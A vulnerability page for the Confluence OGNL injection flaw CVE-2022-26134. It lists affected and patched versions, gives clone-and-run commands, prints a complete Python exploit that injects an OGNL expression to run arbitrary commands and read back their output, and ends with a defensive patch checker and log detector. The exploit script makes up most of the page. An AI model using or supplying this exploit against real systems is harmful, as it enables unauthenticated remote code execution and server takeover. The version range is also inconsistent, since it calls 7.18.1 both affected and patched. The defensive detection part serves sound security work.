CVE-2022-26134

CVE-2022-26134 OGNL injection vulnerability

CVSS: 10
A remote code execution vulnerability affecting Atlassian Confluence products up to version 7.18.
An unauthenticated user can execute arbitrary code on a Confluence Server or Data Center instance.

Affected versions

All supported Confluence Server and Data Center versions are affected.
Confluence Server and Data Center versions 1.3.0 through 7.18.1

Patched Versions

Versions containing the patch, released after the vulnerability was disclosed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1

POC

git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

cve-2022-26134.py (the script from the repository above):

# -*- coding: utf-8 -*-

# Author:   Naqwada (RuptureFarm 1029) <naqwada@pm.me>
# License:  MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs:     https://github.com/Naqwa/CVE-2022-26134
# Website:  http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note:     FOR EDUCATIONAL PURPOSE ONLY.

import requests
import urllib3
import re
import sys
urllib3.disable_warnings()

def banner():
  CVE_2022_26134Logo = """
   _______    ________                                
  / ____/ |  / / ____/                                
 / /    | | / / __/                                   
/ /___  | |/ / /___                                   
\____/  |___/_____/___       ___   _____________ __ __
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/
/____/\____/____/____/    /____/\____/_//____/  /_/   
                                                      
                  \033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m                  
Author: \033[1;92mNaqwada\033[1;m                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))


def check_target_version(host):
  # Reads the version string from the footer-build-information span on the login page.
  try:
    response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
    if response.status_code == 200:
      filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)

      if len(filter_version) >= 1:
        version = filter_version[0].split("'>")[1].split('</')[0]
        return version
      else:
        return False
    else:
      return host
  except requests.RequestException:
    return False


def send_payload(host, command):
  # The URL-encoded OGNL expression is sent as the URI path; the server answers with a
  # 302 whose X-Cmd-Response header carries the command output when it is vulnerable.
  payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
  response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False, timeout=8)

  try:
    if response.status_code == 302:
      return response.headers["X-Cmd-Response"]
    else:
      return "This target does not seem to be vulnerable."
  except KeyError:
    return "This target does not seem to be vulnerable."


def main():
  banner()
  if len(sys.argv) < 3:
    print("\033[1;94mHow to use:\033[1;m")
    print("python3 {} https://target.com cmd".format(sys.argv[0]))
    print("ex: python3 {} https://target.com id".format(sys.argv[0]))
    print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
    return
  
  target = sys.argv[1]
  cmd = sys.argv[2]
  version = check_target_version(target)

  if version:
    print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
  else:
    print("Can't find the used version for this target. Is the target offline?")
    return
  
  exec_payload = send_payload(target, cmd) 
  print(exec_payload)

if __name__ == "__main__":
  main()
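
As an added defender-side example (not part of this page or of the Nwqda repository), the following Python checks a Confluence version string, such as the footer-build-information value the POC reads, against the fixed releases listed above, and flags access-log requests whose path carries a URL-encoded ${...} expression, the shape the POC's payload takes. The log lines are constructed samples, and the rule that a branch with no listed fix is unpatched is an assumption drawn from the fixed-version list.

```python
import re
from urllib.parse import unquote

# Fixed releases listed on this page, keyed by (major, minor) branch.
FIXED = {
    (7, 4): (7, 4, 17), (7, 13): (7, 13, 7), (7, 14): (7, 14, 3),
    (7, 15): (7, 15, 2), (7, 16): (7, 16, 4), (7, 17): (7, 17, 4),
    (7, 18): (7, 18, 1),
}

def parse_version(text):
    # Accepts strings such as "7.13.6" (the footer-build-information value);
    # missing components count as 0.
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_patched(version_text):
    """True if the version is at or above the fixed release for its branch.
    Assumption: a branch with no listed fix (e.g. 7.5 to 7.12) is unpatched."""
    v = parse_version(version_text)
    if v >= (7, 18, 1):  # 7.18.1 and every later release carry the fix
        return True
    fix = FIXED.get(v[:2])
    return fix is not None and v >= fix

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_ognl_attempts(log_lines):
    """Return (client_ip, status, decoded_path) for every request whose path
    holds a ${...} expression, the shape of the CVE-2022-26134 payload."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        decoded = unquote(unquote(path))  # twice, to see through double encoding
        if re.search(r"\$\{.*\}", decoded):
            hits.append((ip, int(status), decoded))
    return hits

# Constructed sample lines (Apache combined format). The second path carries a
# harmless ${(#a=1)} expression with the same shape as an injection attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2022:10:01:12 +0000] "GET /login.action HTTP/1.1" 200 5321',
    '10.0.0.9 - - [03/Jun/2022:10:01:15 +0000] "GET /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [03/Jun/2022:10:01:20 +0000] "GET /pages/viewpage.action HTTP/1.1" 200 8800',
]
```

A 302 answer to such a request, as in the second sample line, matches the response the POC waits for and is worth treating as a successful evaluation rather than a blocked attempt.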

📃 References

https://github.com/Nwqda/CVE-2022-26134